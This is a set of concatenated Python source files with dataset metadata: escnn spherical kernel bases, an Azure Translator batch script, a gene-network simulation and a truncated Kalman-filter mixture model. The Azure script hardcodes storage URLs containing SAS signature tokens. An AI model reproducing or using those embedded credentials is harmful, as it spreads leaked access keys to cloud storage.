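    client_socket.sendall(('My time is ' + time.asctime() + '\n').encode())
    client_socket.close()
```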
kernels defined over a radius in :math:`\\R^+_0`.\n\n Each basis element is defined as a Gaussian function.\n Different basis elements are centered at different radii (``rings``) and can possibly be associated with\n different widths (``sigma``).\n\n More precisely, the following basis is implemented:\n\n .. math::\n\n \\mathcal{B} = \\left\\{ b_i (r) := \\exp \\left( \\frac{ \\left( r - r_i \\right)^2}{2 \\sigma_i^2} \\right) \\right\\}_i\n\n In order to build a complete basis of kernels, you should combine this basis with a basis which defines the\n angular profile through :class:`~escnn.kernels.SphericalShellsBasis`.\n\n\n Args:\n radii (list): centers of each basis element. They should be different and spread to cover all\n domain of interest\n sigma (list or float): widths of each element. Can potentially be different.\n\n\n \"\"\"\n \n if isinstance(sigma, float):\n sigma = [sigma] * len(radii)\n \n assert len(radii) == len(sigma)\n assert isinstance(radii, list)\n \n for r in radii:\n assert r >= 0.\n \n for s in sigma:\n assert s > 0.\n \n super(GaussianRadialProfile, self).__init__(len(radii), (1, 1))\n \n self.radii = np.array(radii).reshape(1, 1, -1, 1)\n self.sigma = np.array(sigma).reshape(1, 1, -1, 1)\n \n def sample(self, radii: np.ndarray, out: np.ndarray = None) -> np.ndarray:\n r\"\"\"\n\n Sample the continuous basis elements on the discrete set of radii in ``radii``.\n Optionally, store the resulting multidimentional array in ``out``.\n\n ``radii`` must be an array of shape `(1, N)`, where `N` is the number of points.\n\n Args:\n radii (~numpy.ndarray): radii where to evaluate the basis elements\n out (~numpy.ndarray, optional): pre-existing array to use to store the output\n\n Returns:\n the sampled basis\n\n \"\"\"\n assert len(radii.shape) == 2\n assert radii.shape[0] == 1\n \n if out is None:\n out = np.empty((self.shape[0], self.shape[1], self.dim, radii.shape[1]))\n \n assert out.shape == (self.shape[0], self.shape[1], self.dim, radii.shape[1])\n \n radii = radii.reshape(1, 1, 1, -1)\n \n d = (self.radii - radii) ** 2\n \n out = np.exp(-0.5 * d / self.sigma ** 2, out=out)\n \n return out\n \n def __getitem__(self, r):\n assert r < self.dim\n return {\"radius\": self.radii[0, 0, r, 0], \"sigma\": self.sigma[0, 0, r, 0], \"idx\": r}\n \n def __eq__(self, other):\n if isinstance(other, GaussianRadialProfile):\n return np.allclose(self.radii, other.radii) and np.allclose(self.sigma, other.sigma)\n else:\n return False\n \n def __hash__(self):\n return hash(self.radii.tobytes()) + hash(self.sigma.tobytes())\n\n\nclass SphericalShellsBasis(KernelBasis):\n \n def __init__(self,\n n: int,\n angular: SteerableKernelBasis,\n radial: GaussianRadialProfile,\n filter: Callable[[Dict], bool] = None\n ):\n r\"\"\"\n\n Build the tensor product basis of a radial profile basis and an spherical profile basis for kernels over the\n Euclidean space :math:`\\R^n`.\n \n The kernel space is spanned by an independent basis for each shell.\n The kernel space over shells with positive radius is spanned the basis defined by the `angular` basis\n (an independent copy of each for each cell).\n The kernel over the shells with zero radius (the origin) is spanned by the `origin` basis.\n \n Given the bases :math:`O = \\{o_i\\}_i` for the origin, :math:`A = \\{a_j\\}_j` for the spherical shells and\n :math:`D = \\{d_r\\}_r` for the radial component (indexed by :math:`r \\geq 0`, the radius different rings),\n this basis is defined as\n\n .. 
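A self-contained numpy sketch of what `GaussianRadialProfile.sample` computes for the class defined above. Note the implementation evaluates `exp(-(r - r_i)^2 / (2 sigma_i^2))`; the docstring formula is missing the minus sign in the exponent. The centre and width values here are arbitrary:

```python
import numpy as np

centers = np.array([0.0, 1.0, 2.0]).reshape(1, 1, -1, 1)  # r_i, as in self.radii
sigma = np.array([0.5, 0.5, 0.5]).reshape(1, 1, -1, 1)    # sigma_i, as in self.sigma
r = np.linspace(0.0, 3.0, 7).reshape(1, 1, 1, -1)         # query radii, one per column

basis = np.exp(-0.5 * (centers - r) ** 2 / sigma ** 2)    # broadcasts to (1, 1, dim, N)
print(basis.shape)                                        # (1, 1, 3, 7)
```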
math::\n C = \\left\\{c_{i,j}(\\bold{p}) := d_r(||\\bold{p}||) a_j(\\hat{\\bold{p}}) \\right\\}_{r>0, j} \\cup \\{d_0(||\\bold{p}||) o_i\\}_i\n\n where :math:`(||\\bold{p}||, \\hat{\\bold{p}})` are the polar coordinates of the point\n :math:`\\bold{p} \\in \\R^n`.\n \n Note that the basis on the origin is represented as a simple `np.ndarray` of 3 dimensions, where the last one\n indexes the basis elements as :math:`i` above.\n \n The radial component is parametrized using :class:`~escnn.kernels.GaussianRadialProfile`.\n \n\n Args:\n n (int): dimension of the Euclidean base space\n angular (SteerableKernelBasis): the angular basis\n radial (GaussianRadialProfile): the basis for the radial profile\n filter (callable, optional): function used to filter out some basis elements. It takes as input a dict\n describing a basis element and should return a boolean value indicating whether to keep (`True`) or\n discard (`False`) the element. By default (`None`), all basis elements are kept.\n\n Attributes:\n ~.radial (GaussianRadialProfile): the radial basis\n ~.angular (SteerableKernelBasis): the angular basis\n ~.origin (SteerableKernelBasis): the basis for the origin\n\n \"\"\"\n\n self.n = n\n self.radial = radial\n self.angular = angular\n \n # TODO - create singleton classes \"spaces\"\n # include Spheres S^d, points, lines, etc...\n # SpaceIsom should be a pair (HomSpace, Space)\n # the _is_point() method should belong to the space\n # here we should assert that the SpaceIsom is associated with the sphere S^{n-1}\n \n sphere = angular.X\n try:\n origin = SteerableKernelBasis(\n PointRn(self.n, sphere.G),\n angular.in_repr,\n angular.out_repr,\n angular._irrep_basis,\n # the origin contains only the frequency 0 harmonic\n harmonics=[sphere.zero_harmonic],\n **angular._irrep__basis_kwargs\n )\n except EmptyBasisException:\n origin = None\n\n if origin is not None:\n assert angular.shape == origin.shape[:2]\n assert angular.in_repr == origin.in_repr\n assert angular.out_repr == origin.out_repr\n assert angular.group == origin.group\n\n assert len(origin.js) == 1\n assert origin.js[0] == sphere.zero_harmonic\n assert origin.js[0] in angular.js\n assert (\n origin.dim_harmonic(sphere.zero_harmonic)\n ==\n angular.dim_harmonic(sphere.zero_harmonic)\n )\n assert origin.dim_harmonic(sphere.zero_harmonic) == origin.dim\n \n self.origin = origin\n\n if filter is not None:\n self._filter = np.zeros(len(self.angular) * len(self.radial), dtype=np.int)\n _idx_map = []\n i = 0\n for attr1 in self.radial:\n for attr2 in self.angular:\n attr = dict()\n attr.update(attr1)\n attr.update(attr2)\n \n if filter(attr):\n self._filter[i] = 1\n _idx_map.append(i)\n i += 1\n \n dim = int(self._filter.sum())\n self._idx_map = np.array(_idx_map)\n else:\n self._filter = None\n self._idx_map = None\n dim = len(self.angular) * len(self.radial)\n \n super(SphericalShellsBasis, self).__init__(dim, (radial.shape[0] * angular.shape[0], radial.shape[1] * angular.shape[1]))\n \n def sample(self, points: np.ndarray, out: np.ndarray = None) -> np.ndarray:\n r\"\"\"\n\n Sample the continuous basis elements on a discrete set of ``points`` in the space :math:`\\R^n`.\n Optionally, store the resulting multidimensional array in ``out``.\n\n ``points`` must be an array of shape `(n, N)` containing `N` points in the space.\n Note that the points are specified in cartesian coordinates :math:`(x, y, z, ...)`.\n\n Args:\n points (~numpy.ndarray): points in the n-dimensional Euclidean space where to evaluate the basis elements\n out 
(~numpy.ndarray, optional): pre-existing array to use to store the output\n\n Returns:\n the sampled basis\n\n \"\"\"\n assert len(points.shape) == 2\n assert points.shape[0] == self.n\n \n # computes the polar coordinates\n # radii, angles = cart2pol(points)\n \n radii = np.sqrt((points ** 2).sum(axis=0, keepdims=True))\n \n non_origin_mask = (radii > 1e-99).reshape(-1)\n sphere = points[:, non_origin_mask] / radii[:, non_origin_mask]\n origin = points[:, ~non_origin_mask]\n\n if out is None:\n out = np.empty((self.shape[0], self.shape[1], self.dim, points.shape[1]))\n \n assert out.shape == (self.shape[0], self.shape[1], self.dim, points.shape[1])\n \n # sample the radial basis\n o1 = self.radial.sample(radii)\n\n # sample the angular basis\n o2 = np.empty((self.shape[0], self.shape[1], self.angular.dim, points.shape[1]))\n o2.fill(np.nan)\n\n # where r>0, we sample all frequencies\n o2[..., non_origin_mask] = self.angular.sample(sphere)\n \n # only frequency 0 is sampled at the origin. Other frequencies are set to 0\n if self.origin is not None:\n o2[..., :self.origin.dim, ~non_origin_mask] = self.origin.sample(origin)\n o2[..., self.origin.dim:, ~non_origin_mask] = 0.\n else:\n o2[..., ~non_origin_mask] = 0.\n \n assert not np.isnan(o1).any()\n assert not np.isnan(o2[..., non_origin_mask]).any()\n assert not np.isnan(o2[..., ~non_origin_mask]).any()\n assert not np.isnan(o2).any()\n\n m, n, a, p = o1.shape\n q, r, b, p = o2.shape\n \n if self._filter is None:\n np.einsum(\"mnap,qrbp->mqnrabp\", o1, o2, out=out.reshape((m, q, n, r, a, b, p)))\n return out.reshape((q * m, n * r, self.dim, p))\n else:\n out[:] = np.einsum(\"mnap,qrb->mqnrabp\", o1, o2).reshape((m * q, n * r, a * b, p))[..., self._filter, :]\n return out\n \n def __getitem__(self, idx):\n assert idx < self.dim\n \n if self._idx_map is None:\n _idx = idx\n else:\n _idx = self._idx_map[idx]\n \n idx1, idx2 = divmod(_idx, self.angular.dim)\n attr1 = self.radial[idx1]\n attr2 = self.angular[idx2]\n \n assert attr1[\"idx\"] == idx1\n assert attr2[\"idx\"] == idx2\n\n attr = dict()\n attr.update(attr1)\n attr.update(attr2)\n\n attr[\"idx\"] = idx\n attr[\"idx1\"] = attr1[\"idx\"]\n attr[\"idx2\"] = attr2[\"idx\"]\n\n return attr\n\n def __iter__(self):\n idx = 0\n i = 0\n\n # since this methods return iterables of attributes built on the fly, load all attributes first and then\n # iterate on these lists\n radial_attrs = list(self.radial)\n angular_attrs = list(self.angular)\n\n for idx1, attr1 in enumerate(radial_attrs):\n for idx2, attr2 in enumerate(angular_attrs):\n if self._filter is None or self._filter[i] == 1:\n \n assert attr1[\"idx\"] == idx1\n assert attr2[\"idx\"] == idx2\n \n attr = dict()\n attr.update(attr1)\n attr.update(attr2)\n attr[\"idx1\"] = attr1[\"idx\"]\n attr[\"idx2\"] = attr2[\"idx\"]\n attr[\"idx\"] = idx\n\n yield attr\n idx += 1\n i += 1\n \n def __eq__(self, other):\n if isinstance(other, SphericalShellsBasis):\n return (\n self.n == other.n and\n self.radial == other.radial and\n self.angular == other.angular and\n self.origin == other.origin and\n self._filter == other._filter\n )\n else:\n return False\n \n def __hash__(self):\n return self.n + hash(self.radial) + hash(self.angular) + hash(self.origin) + hash(self._filter)\n\n\nif __name__ == \"__main__\":\n \n for _ in range(100):\n for n in range(2, 6):\n x = np.random.randn(n, 4)\n \n radii, angles = cart2pol(x)\n y = pol2cart(radii, angles)\n \n print(x)\n print(radii)\n print(angles)\n print(y)\n assert np.allclose(x, 
y)\n","repo_name":"hai-h-nguyen/equi-rl-for-pomdps","sub_path":"escnn/escnn/kernels/polar_basis.py","file_name":"polar_basis.py","file_ext":"py","file_size_in_byte":14602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"17518288610","text":"import requests, infos\n\n# Endpoint of your translator Service on Azure\nendpoint = \"https://mdtranslator25.cognitiveservices.azure.com/translator/text/batch/v1.0-preview.1\"\nsubscriptionKey = infos.subscriptionKey # Add your subscription key here!\npath = '/batches'\nconstructed_url = endpoint + path\n\npayload= {\n \"inputs\": [\n {\n \"source\": {\n \"sourceUrl\": \"https://mdsourcedocs.blob.core.windows.net/demo1?sv=2020-04-08&st=2021-05-18T15%3A32%3A05Z&se=2021-05-28T15%3A32%3A00Z&sr=c&sp=rl&sig=6cA7hWg%2F63Jyq6xur8qrySewhV1pSaJ4ds%2Bbj2u3klo%3D\",\n # Storage ource of the document \n \"storageSource\": \"AzureBlob\",\n \"language\": \"en\",\n \"filter\":{\n #\"prefix\": \"Demo_1/\"\n }\n },\n \"targets\": [\n {\n \"targetUrl\": \"https://mdtargetdocs.blob.core.windows.net/demo1?sv=2020-04-08&st=2021-05-18T15%3A34%3A57Z&se=2021-05-28T15%3A34%3A00Z&sr=c&sp=wl&sig=RPhBNbnmEM%2BS16cZVwnG3v6t46lZv4wm0%2BlaIeXb%2B60%3D\",\n #Target Storage for the translated document\n \"storageSource\": \"AzureBlob\",\n \"category\": \"general\",\n \"language\": \"es\"\n }\n ]\n }\n ]\n}\nheaders = {\n 'Ocp-Apim-Subscription-Key': subscriptionKey,\n 'Content-Type': 'application/json'\n}\n\nresponse = requests.post(constructed_url, headers=headers, json=payload)\n\nprint(f'response status code: {response.status_code}\\nresponse status: {response.reason}\\nresponse headers: {response.headers}')","repo_name":"mddiallo/cognitive-service-translate","sub_path":"docs_translate.py","file_name":"docs_translate.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70472769260","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 3 11:19:44 2019\r\n\r\n@author: Jerry\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nfrom GRN import DynamicModel,Recoder,MonteCarloSimulator\r\n\r\nN = 2000\r\nalpha = 1\r\navgDegree = 3\r\ngamma = 0.7\r\nlimitedRegimePatNum = 6\r\ndenseRegimeExpRate = 0.3\r\ntemperature = 0.00\r\ntotalSteps = 50\r\nbinDist = 100\r\nnumSim = 100\r\nregimes_P = ['saturated','sub_extensive','limited']\r\nregimes_C = ['sparse','extreme_dilution','dense']\r\nfigFile = r'E:\\KCL\\FinalProject\\figures/'\r\n\r\nconfig = tf.ConfigProto()\r\nconfig.gpu_options.allow_growth=True\r\nconfig.gpu_options.allocator_type = 'BFC'\r\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.95\r\n\r\ndm = DynamicModel(temperature,\r\n N,\r\n avgDegree,\r\n alpha,\r\n ifDeco=False,\r\n tfConfig=config,\r\n gamma=gamma,\r\n withExt=True)\r\ndm1 = DynamicModel(temperature,\r\n N,\r\n avgDegree,\r\n alpha,\r\n ifDeco=False,\r\n tfConfig=config,\r\n gamma=gamma,\r\n withExt=False)\r\nre = Recoder(dm,totalSteps,binDist,ifSync=False)\r\nmulti_overlap_observation = Recoder.multi_observation(55)(Recoder.hamming_overlap)\r\n\r\nfor reg_p in regimes_P:\r\n for reg_c in regimes_C:\r\n if reg_p is not 'limited':\r\n dm.regime_P(reg_p)\r\n else:\r\n dm.regime_P(reg_p,limitedRegimePatNum)\r\n \r\n if reg_c is not 'dense':\r\n dm.regime_C(reg_c)\r\n else:\r\n dm.regime_C(reg_c,denseRegimeExpRate)\r\n\r\n dm._init_memMat()\r\n print(\"now is in \"+reg_p+\" and \"+reg_c+\" regime...\")\r\n\r\n multi_overlap_observation(re)\r\n\r\n 
re.plot()\r\n figName = 'distanceMatrix_'+reg_p+'_'+reg_c+'.png'\r\n re.fig.savefig(figFile+figName)\r\n print(\"Exiting current regime...\")","repo_name":"BigJerry/GRN","sub_path":"alpha_c_trials_2.py","file_name":"alpha_c_trials_2.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74198652779","text":"from pykalman import KalmanFilter\nimport pykalman.standard as filtermethods\nimport numpy as np\nimport scipy as sp\nfrom scipy.special import logsumexp\nfrom scipy.stats import multivariate_normal\n\n\nclass LDSMixture:\n def __init__(self):\n \"\"\"\n transition_matrix:predicts state at time t from state at t-1\n transition_covariance: covariance matrix for state\n observation_matrix: transforms state into observation\n observation_covariance: covariance matrix for observation\n initial_state_means, initial_state_covariances: parameterize\n initial state distribution for each trajectory\n \"\"\"\n self.transition_matrix = None\n self.transition_covariances = None\n\n self.observation_matrix = None\n self.observation_covariances = None\n\n self.initial_state_means = None\n self.initial_state_covariances = None\n\n self.responsibilities = None\n\n self.state_means = None\n self.state_covariances = None\n self.pairwise_covariances = None\n\n self.component_weights = None\n\n self.K = None # number of mixture components\n self.U = None # observation dimensionality\n self.V = None # state dimensionality\n self.T = None # timepoints\n\n # evidence lower bound = expected complete log likelihood + entropy\n self.lower_bound = None\n\n # expected complete log likelihood E[logP(X, Y, Z | parameters)]\n self.expected_likelihoods = None\n\n # negative expected log likelihood of latent variable distributions\n self.entropies = None\n\n def initialize(self, data, K, U, V, T, process_noise, observation_noise):\n \"\"\"\n Initialize the model\n we need all the model parameters plus initial responsibilities or\n initial states and covariances\n\n This isn't a very thoughtful initialization but the rest of the code\n should work regardless given this information.\n \"\"\"\n self.K = K\n self.U = U\n self.V = V\n self.T = T\n N = data.shape[0]\n\n self.transition_matrix = np.array([[1]])\n transition_covariance = np.array([[process_noise**2]])\n self.transition_covariances = np.array([transition_covariance] * K)\n\n self.observation_matrix = np.array([[1]])\n self.observation_covariance = np.array([[observation_noise**2]])\n\n self.initial_state_means = np.zeros(K)\n self.initial_state_covariance = np.array([[1]])\n\n self.initial_state_means = np.zeros(K)\n initial_state_covariance = np.array([[1]])\n self.initial_state_covariances = \\\n np.array([initial_state_covariance] * K)\n\n responsibilities = np.random.rand(N, K)\n responsibilities = \\\n responsibilities / responsibilities.sum(axis=1)[:, np.newaxis]\n self.responsibilities = responsibilities\n\n self.component_weights = np.ones(K) / K\n\n self.state_means = np.empty((K, T, U))\n self.state_covariances = np.empty((K, T, V, V))\n self.pairwise_covariances = np.empty((K, T, V, V))\n\n def em(self, data, threshold=1e-3, iter_max=1000):\n \"\"\"\n perform em\n does variational inference over hidden states in e step\n updates model parameters given hidden state distributions in m step\n \"\"\"\n elbos = []\n for i in range(iter_max):\n elbos.extend(self.estep(data))\n elbos.append(self.mstep(data)[0])\n elbo_diff = elbos[-1] - elbos[-2]\n if 
elbo_diff < threshold:\n break\n\n def mstep(self, data):\n \"\"\"\n mstep updated model parameters:\n component_weights\n observation covariance, shared across clusters\n transition_covariance, unique to each trajectory\n initial state distributions for each trajectory\n \"\"\"\n K = self.K\n V = self.V\n\n # compute updated parameters\n component_weights = _update_component_weights(\n responsibilities=self.responsibilities\n )\n\n observation_covariance = _update_observation_covariance(\n data=data,\n state_means=self.state_means,\n state_covariances=self.state_covariances,\n responsibilities=self.responsibilities\n )\n\n transition_covariances = np.empty((K, V, V))\n for k in range(K):\n transition_covariances[k] = _update_transition_covariances(\n transition_matrix=self.transition_matrix,\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n initial_state_means = _update_initial_state_means(\n state_means=self.state_means\n )\n\n initial_state_covariances = np.zeros((K, V, V))\n for k in range(K):\n initial_state_covariances[k] = _update_initial_state_covariance(\n initial_state_mean=self.initial_state_means[k],\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n )\n\n # update object attributes with new parameter estimates\n self.component_weights = component_weights\n self.observation_covariance = observation_covariance\n self.transition_covariances = transition_covariances\n self.initial_state_means = initial_state_means\n self.initial_state_covariances = initial_state_covariances\n\n return self.elbo(data)\n\n def update_component_weights(self):\n \"\"\"\n update component weights\n \"\"\"\n self.component_weights = _update_component_weights(\n responsibilities=self.responsibilities\n )\n\n def update_observation_covariance(self, data):\n \"\"\"\n update observation weights\n \"\"\"\n self.observation_covariance = _update_observation_covariance(\n data=data,\n state_means=self.state_means,\n state_covariances=self.state_covariances,\n responsibilities=self.responsibilities\n )\n\n def update_transition_covariances(self):\n \"\"\"\n update transition covariances for each trajectory\n \"\"\"\n K = self.K\n V = self.V\n transition_covariances = np.empty((K, V, V))\n for k in range(K):\n transition_covariances[k] = _update_transition_covariances(\n transition_matrix=self.transition_matrix,\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n self.transition_covariances = transition_covariances\n\n def update_initial_state_means(self):\n \"\"\"\n update initial state means\n \"\"\"\n self.initial_state_means = self.state_means[:, 0]\n\n def update_initial_state_covariances(self):\n \"\"\"\n update initial state covariances\n \"\"\"\n K = self.K\n V = self.V\n\n initial_state_covariances = np.zeros((K, V, V))\n for k in range(K):\n initial_state_covariances[k] = _update_initial_state_covariance(\n initial_state_mean=self.initial_state_means[k],\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n )\n self.initial_state_covariances = initial_state_covariances\n\n def estep(self, data, threshold=1e-5, iter_max=1000, show_training=False):\n \"\"\"\n data: samples x timepoints matrix of data\n threshold: covergence threshold for variational inference\n iter_max: maximum number of iterations for variational inference\n show training: if true print change in 
evidence lower bound at\n each iteration\n \"\"\"\n elbos = []\n\n for i in range(iter_max):\n self._estimate_states(data)\n self._estimate_responsibilities(data)\n elbos.append(self.elbo(data))\n\n if i >= 1:\n elbo_diff = elbos[-1] - elbos[-2]\n if show_training:\n print(elbo_diff)\n assert(elbo_diff >= 0)\n if elbo_diff < threshold:\n break\n\n return elbos\n\n def _estep(self, data):\n \"\"\"\n one iteration of variational inference for e step\n \"\"\"\n self._estimate_responsibilities(data)\n self._estimate_states(data)\n\n return self.elbo(data)\n\n def _estimate_responsibilities(self, data):\n \"\"\"\n estimate posterior assignment probabilities given state estimates\n \"\"\"\n arguments = {\n 'state_means': self.state_means,\n 'state_covariances': self.state_covariances,\n 'observation_covariance': self.observation_covariance,\n 'component_weights': self.component_weights\n }\n\n expected_conditional_likelihoods = np.array(list(map(\n lambda obs: _expected_conditional_likelihoods(obs, **arguments),\n data\n )))\n\n responsibilities = np.array(list(map(\n _responsibilities_update, expected_conditional_likelihoods\n )))\n\n self.responsibilities = responsibilities\n\n def _filter_and_smooth(self, f, included, data):\n \"\"\"\n f: kalman filter object\n included: boolean array indicating which\n data points have non-zero assignment probability\n data: data to estimate states on\n\n kalman filtering step, estimates distribution over state sequence\n given all of the data. relies on kalman filter package pykalman\n \"\"\"\n # estimate states\n if f is not None:\n # f is none when no observations areassigned to it\n Z = f._parse_observations(data[included].T)\n\n (transition_matrices, transition_offsets,\n transition_covariance, observation_matrices,\n observation_offsets, observation_covariance,\n initial_state_mean, initial_state_covariance) = (\n f._initialize_parameters()\n )\n\n (predicted_state_means, predicted_state_covariances,\n _, filtered_state_means, filtered_state_covariances) = (\n filtermethods._filter(\n transition_matrices, observation_matrices,\n transition_covariance, observation_covariance,\n transition_offsets, observation_offsets,\n initial_state_mean, initial_state_covariance, Z\n )\n )\n\n (smoothed_state_means, smoothed_state_covariances,\n kalman_smoothing_gains) = (\n filtermethods._smooth(\n transition_matrices, filtered_state_means,\n filtered_state_covariances, predicted_state_means,\n predicted_state_covariances\n )\n )\n\n pairwise_covariances = filtermethods._smooth_pair(\n smoothed_state_covariances,\n kalman_smoothing_gains\n )\n\n state_means = smoothed_state_means\n state_covariances = smoothed_state_covariances\n pairwise_covariances = pairwise_covariances\n\n else:\n # no observations are assigned, this cluster isn't being used\n state_means = None\n state_covariances = None\n pairwise_covariances = None\n\n return state_means, state_covariances, pairwise_covariances\n\n def _estimate_states(self, data):\n \"\"\"\n estimates state sequences for all trajectories/clusters\n \"\"\"\n K = self.K\n\n # set up filters\n filters = [\n _initialize_filter(\n transition_matrix=self.transition_matrix,\n observation_matrix=self.observation_matrix,\n transition_covariance=self.transition_covariances[k],\n observation_covariance=self.observation_covariance,\n initial_state_mean=self.initial_state_means[k],\n initial_state_covariance=self.initial_state_covariance,\n responsibilities=self.responsibilities[:, k]\n )\n for k in range(K)\n ]\n\n # estimate state 
distributions\n for k in range(K):\n f, included = filters[k]\n means, covariances, pairwise_covariances = \\\n self._filter_and_smooth(f, included, data)\n\n if means is not None:\n # if we actually got new state estimates update\n # model attributes\n self.state_means[k] = means\n self.state_covariances[k] = covariances\n self.pairwise_covariances[k] = pairwise_covariances\n\n def elbo(self, data):\n \"\"\"\n computed the evidence lower bound of the data\n returns float: evidence lower bound of data\n \"\"\"\n K = self.K\n N = data.shape[0] # number of observations\n\n entropies = np.zeros(N + K)\n expected_likelihoods = np.zeros(N + K)\n\n for j, observation in enumerate(data):\n expected_likelihoods[j] = _expected_observation_likelihood(\n observation=observation,\n responsibilities=self.responsibilities[j],\n state_means=self.state_means,\n state_covariances=self.state_covariances,\n observation_covariance=self.observation_covariance,\n component_weights=self.component_weights\n )\n\n for j, observation in enumerate(data):\n entropies[j] = \\\n _assignment_entropy(responsibilities=self.responsibilities[j])\n\n for k in range(K):\n expected_likelihoods[N + k] = _expected_sequence_likelihood(\n initial_state_mean=self.initial_state_means[k],\n initial_state_covariance=self.initial_state_covariances[k],\n transition_covariance=self.transition_covariances[k],\n state_means=self.state_means[k],\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n entropies[N + k] = _state_sequence_entropy(\n state_covariances=self.state_covariances[k],\n pairwise_covariances=self.pairwise_covariances[k]\n )\n\n seperate_elbos = expected_likelihoods + entropies\n elbo = seperate_elbos.sum()\n\n self.lower_bound = elbo\n self.expected_likelihoods = expected_likelihoods\n self.entropies = entropies\n\n return elbo\n\n\ndef _initialize_filter(transition_matrix, observation_matrix,\n transition_covariance, observation_covariance,\n initial_state_mean, initial_state_covariance,\n responsibilities):\n \"\"\"\n creates kalman filter object from model parameters and responsibilities\n if responsibilities are zero for any observation it will not be included\n to avoid infinite varaince in the observation covariance matrix for all\n observation.\n\n each filter object has its corresponding model paramters and a large block\n diagonal matrix of the observation covariance scaled by the responsibility\n\n returns a filter object and a boolean array of included observations\n \"\"\"\n\n included = np.logical_not(np.isclose(responsibilities, 0))\n observation_dim = np.sum(included)\n\n if observation_dim > 0:\n block_observation_covariance = sp.linalg.block_diag(\n *[observation_covariance / r for r in responsibilities[included]]\n )\n\n f = KalmanFilter(\n transition_matrices=transition_matrix,\n observation_matrices=np.tile(\n observation_matrix, (observation_dim, 1)\n ),\n transition_covariance=transition_covariance,\n observation_covariance=block_observation_covariance,\n initial_state_mean=initial_state_mean,\n initial_state_covariance=initial_state_covariance,\n n_dim_state=1, n_dim_obs=observation_dim\n )\n else:\n f = None\n\n return f, included\n\n\n\"\"\"\nPARAMETER UPDATES\n\"\"\"\n\n\ndef _responsibilities_update(expected_conditional_likelihoods):\n responsibilities = np.exp(\n expected_conditional_likelihoods -\n logsumexp(expected_conditional_likelihoods)\n )\n\n return responsibilities\n\n\ndef _expected_squared_error(observation, state_means, 
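`_responsibilities_update` above is the standard log-space softmax: subtracting `logsumexp` before exponentiating keeps the normalisation stable when the per-component log-likelihoods are large and negative. A tiny demonstration with arbitrary values:

```python
import numpy as np
from scipy.special import logsumexp

log_lik = np.array([-1200.0, -1201.0, -1205.0])   # per-component log-likelihoods
resp = np.exp(log_lik - logsumexp(log_lik))       # naive np.exp(log_lik) underflows to 0
print(resp, resp.sum())                           # responsibilities sum to 1.0
```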
state_covariances,\n observation_precision, observation_matrix):\n\n \"\"\"\n (y-x)T R-1 (y-x)\n \"\"\"\n T = observation.shape[0]\n expected_squared_error = 0\n for t in range(T):\n residual = (observation[t] -\n np.dot(observation_matrix, state_means[t])\n ).reshape(-1, 1)\n expected_squared_error += np.linalg.multi_dot([\n residual.T,\n observation_precision,\n residual\n ])\n\n expected_squared_error += np.linalg.multi_dot([\n observation_precision,\n observation_matrix,\n state_covariances.sum(axis=0),\n observation_matrix\n ])\n\n return expected_squared_error\n\n\ndef _expected_squared_errors(data, state_means, state_covariances,\n observation_covariance, observation_matrix):\n N = data.shape[0]\n K = state_means.shape[0]\n expected_squared_errors = np.empty((N, K))\n observation_precision = np.linalg.pinv(observation_covariance)\n for j, observation in enumerate(data):\n for k in range(K):\n expected_squared_errors[j, k] = _expected_squared_error(\n observation=observation,\n state_means=state_means[k],\n state_covariances=state_covariances[k],\n observation_precision=observation_precision,\n observation_matrix=observation_matrix\n )\n return expected_squared_errors\n\n\n\"\"\"\nEXPECTED LIKELIHOOD AND ENTROPY STUFF\n\"\"\"\n\n\ndef _expected_observation_likelihood(observation, responsibilities,\n state_means, state_covariances,\n observation_covariance,\n component_weights):\n \"\"\"\n expected likelihood of a single observation sequence\n expectation taken over posterior distribution of assignment\n and state sequences\n \"\"\"\n expected_conditional_likelihoods = _expected_conditional_likelihoods(\n observation, state_means, state_covariances,\n observation_covariance, component_weights\n )\n\n expected_observation_likelihood = np.sum(\n responsibilities * expected_conditional_likelihoods\n )\n\n return expected_observation_likelihood\n\n\ndef _expected_conditional_likelihoods(observation, state_means,\n state_covariances,\n observation_covariance,\n component_weights):\n \"\"\"\n expected likelihood of an observation given a component\n returns a K vector where each is the conditional expected\n likelihood that the observation was generated from that component\n note this includes component mixture probability\n \"\"\"\n\n T = observation.shape[0]\n K = component_weights.shape[0]\n\n conditional_expected_likelihoods = np.zeros(K)\n\n observation_precision = np.linalg.pinv(observation_covariance)\n for k in range(K):\n sub = 0\n for t in range(T):\n sub += _expected_normal_logpdf(\n x=observation[t],\n mean=state_means[k, t],\n covariance=observation_covariance,\n precision=observation_precision,\n mean_covariance=state_covariances[k, t]\n )\n\n conditional_expected_likelihoods[k] = \\\n np.log(component_weights[k]) + sub\n\n return conditional_expected_likelihoods\n\n\ndef _expected_sequence_likelihood(initial_state_mean, initial_state_covariance,\n transition_covariance, state_means,\n state_covariances, pairwise_covariances):\n\n \"\"\"\n expectation of state sequence likelihood\n expectation taken over estimated state distribution\n \"\"\"\n expected_sequence_likelihood = 0\n expected_sequence_likelihood += _expected_normal_logpdf(\n x=state_means[0],\n mean=initial_state_mean,\n covariance=initial_state_covariance,\n mean_covariance=state_covariances[0]\n )\n\n T = state_means.shape[0]\n for t in range(1, T):\n covariance = state_covariances[t] + state_covariances[t-1] - \\\n (2 * pairwise_covariances[t])\n\n expected_sequence_likelihood += _expected_normal_logpdf(\n 
